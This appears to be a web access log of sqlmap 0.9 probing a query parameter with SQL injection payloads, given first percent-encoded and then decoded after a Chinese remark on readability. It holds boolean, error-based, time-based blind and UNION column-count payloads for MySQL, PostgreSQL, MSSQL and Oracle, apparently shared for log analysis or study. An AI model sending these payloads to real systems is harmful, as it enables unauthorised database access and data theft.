GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL--%20AND%20%28%27NTJB%27%3D%27NTJB HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20AND%20%28%27oeMZ%27%3D%27oeMZ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20AND%20%28%27ybnv%27%3D%27ybnv HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%28%27xgNZ%27%3D%27xgNZ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%28%27NcqU%27%3D%27NcqU HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%28%27QwuM%27%3D%27QwuM HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%28%27taty%27%3D%27taty HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%28%27WMQh%27%3D%27WMQh HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%28%27xCZi%27%3D%27xCZi HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%28%27mLyg%27%3D%27mLyg HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL--%20AND%20%27uZYX%27%3D%27uZYX HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20AND%20%27sNHY%27%3D%27sNHY HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20AND%20%27kGUJ%27%3D%27kGUJ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%27LgDK%27%3D%27LgDK HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%27EVdv%27%3D%27EVdv HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%27rJml%27%3D%27rJml HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%27DaKV%27%3D%27DaKV HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%27nUAD%27%3D%27nUAD HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%27yeMd%27%3D%27yeMd HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20%27ttBR%27%3D%27ttBR HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)

这些log有太多的百分号编码，稍微影响阅读，这里我帖一下转译完成的代码

GET /?a=1 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=2904 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1"(''("(')( HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND 8676=9977 AND (9633=9633 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND 3925=3925 AND (9861=9861 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND 636=7258 AND (5513=5513 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND 4986=6711 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND 3925=3925 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND 3864=9683 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND 940=4505 AND ('konc'='konc HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND 3925=3925 AND ('FFCP'='FFCP HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND 7381=1001 AND ('OLcv'='OLcv HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND 2327=9115 AND 'Qlha'='Qlha HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND 3925=3925 AND 'Wlgw'='Wlgw HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND 1192=5861 AND 'mmuZ'='mmuZ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND (SELECT 8251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,107,108,58),(SELECT (CASE WHEN (8251=8251) THEN 1 ELSE 0 END)),CHAR(58,102,112,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (7269=7269 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND (SELECT 8251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,107,108,58),(SELECT (CASE WHEN (8251=8251) THEN 1 ELSE 0 END)),CHAR(58,102,112,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND (SELECT 8251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,107,108,58),(SELECT (CASE WHEN (8251=8251) THEN 1 ELSE 0 END)),CHAR(58,102,112,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ('kalg'='kalg HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND (SELECT 8251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,116,107,108,58),(SELECT (CASE WHEN (8251=8251) THEN 1 ELSE 0 END)),CHAR(58,102,112,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'bMbA'='bMbA HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND 3131=CAST(CHR(58)||CHR(116)||CHR(107)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (3131=3131) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(102)||CHR(112)||CHR(117)||CHR(58) AS NUMERIC) AND (1279=1279 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND 3131=CAST(CHR(58)||CHR(116)||CHR(107)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (3131=3131) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(102)||CHR(112)||CHR(117)||CHR(58) AS NUMERIC) HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND 3131=CAST(CHR(58)||CHR(116)||CHR(107)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (3131=3131) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(102)||CHR(112)||CHR(117)||CHR(58) AS NUMERIC) AND ('RfWr'='RfWr HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND 3131=CAST(CHR(58)||CHR(116)||CHR(107)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (3131=3131) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(102)||CHR(112)||CHR(117)||CHR(58) AS NUMERIC) AND 'uRAt'='uRAt HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND 5622=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR(107)+CHAR(108)+CHAR(58)+(SELECT (CASE WHEN (5622=5622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(112)+CHAR(117)+CHAR(58))) AND (3395=3395 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND 5622=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR(107)+CHAR(108)+CHAR(58)+(SELECT (CASE WHEN (5622=5622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(112)+CHAR(117)+CHAR(58))) HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND 5622=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR(107)+CHAR(108)+CHAR(58)+(SELECT (CASE WHEN (5622=5622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(112)+CHAR(117)+CHAR(58))) AND ('FJAP'='FJAP HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND 5622=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR(107)+CHAR(108)+CHAR(58)+(SELECT (CASE WHEN (5622=5622) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(112)+CHAR(117)+CHAR(58))) AND 'wdHo'='wdHo HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND 8421=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(107)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (8421=8421) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(112)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND (1009=1009 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND 8421=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(107)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (8421=8421) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(112)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND 8421=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(107)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (8421=8421) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(112)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND ('ytpV'='ytpV HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND 8421=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)||CHR(107)||CHR(108)||CHR(58)||(SELECT (CASE WHEN (8421=8421) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(112)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND 'KQDt'='KQDt HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1); SELECT SLEEP(5);--  AND (7560=7560 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1; SELECT SLEEP(5);-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1'); SELECT SLEEP(5);--  AND ('AfMz'='AfMz HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1'; SELECT SLEEP(5);--  AND 'pIKO'='pIKO HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1); SELECT PG_SLEEP(5);-- AND (3641=3641 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1; SELECT PG_SLEEP(5);-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1'); SELECT PG_SLEEP(5);-- AND ('mTPd'='mTPd HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1'; SELECT PG_SLEEP(5);-- AND 'lhez'='lhez HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1); WAITFOR DELAY '0:0:5';-- AND (5747=5747 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1; WAITFOR DELAY '0:0:5';-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1'); WAITFOR DELAY '0:0:5';-- AND ('iUug'='iUug HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1'; WAITFOR DELAY '0:0:5';-- AND 'oGtV'='oGtV HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND SLEEP(5) AND (3924=3924 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND SLEEP(5) HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND SLEEP(5) AND ('vnCj'='vnCj HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND SLEEP(5) AND 'xHdS'='xHdS HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND 851=(SELECT 851 FROM PG_SLEEP(5)) AND (7626=7626 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND 851=(SELECT 851 FROM PG_SLEEP(5)) HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND 851=(SELECT 851 FROM PG_SLEEP(5)) AND ('vrAE'='vrAE HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND 851=(SELECT 851 FROM PG_SLEEP(5)) AND 'VcUg'='VcUg HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) WAITFOR DELAY '0:0:5'-- AND (3376=3376 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 WAITFOR DELAY '0:0:5'-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') WAITFOR DELAY '0:0:5'-- AND ('cMqq'='cMqq HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' WAITFOR DELAY '0:0:5'-- AND 'QQdM'='QQdM HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) AND 7586=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(97)||CHR(104)||CHR(110),5) AND (4545=4545 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 AND 7586=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(97)||CHR(104)||CHR(110),5) HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') AND 7586=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(97)||CHR(104)||CHR(110),5) AND ('JNkT'='JNkT HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' AND 7586=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(97)||CHR(104)||CHR(110),5) AND 'YxKy'='YxKy HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL# AND (771=771 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL# AND (2265=2265 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL# AND (6668=6668 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL# AND (3039=3039 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND (7237=7237 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND (1361=1361 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (7315=7315 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (6174=6174 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (5136=5136 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (2494=2494 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL# AND ('nymA'='nymA HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL# AND ('ijmk'='ijmk HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL# AND ('oFxP'='oFxP HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL# AND ('CWYo'='CWYo HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND ('lxqZ'='lxqZ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND ('DWNP'='DWNP HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('byrs'='byrs HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('KEvQ'='KEvQ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('OLyg'='OLyg HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('TOsV'='TOsV HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL# AND 'mDCu'='mDCu HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL# AND 'VTxz'='VTxz HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL# AND 'YmTa'='YmTa HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL# AND 'MMix'='MMix HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND 'bXGh'='bXGh HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND 'DuTO'='DuTO HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'JVBX'='JVBX HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xxHC'='xxHC HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'zReF'='zReF HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'iOvN'='iOvN HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL-- AND (2876=2876 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL-- AND (4969=4969 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL-- AND (1601=1601 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL-- AND (5858=5858 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND (67=67 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND (6756=6756 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (3876=3876 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (1001=1001 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (7414=7414 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (767=767 HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL-- AND ('NTJB'='NTJB HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL-- AND ('oeMZ'='oeMZ HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
GET /?a=1') UNION ALL SELECT NULL, NULL, NULL-- AND ('ybnv'='ybnv HTTP/1.1   sqlmap/0.9 (https://sqlmap.sourceforge.net)
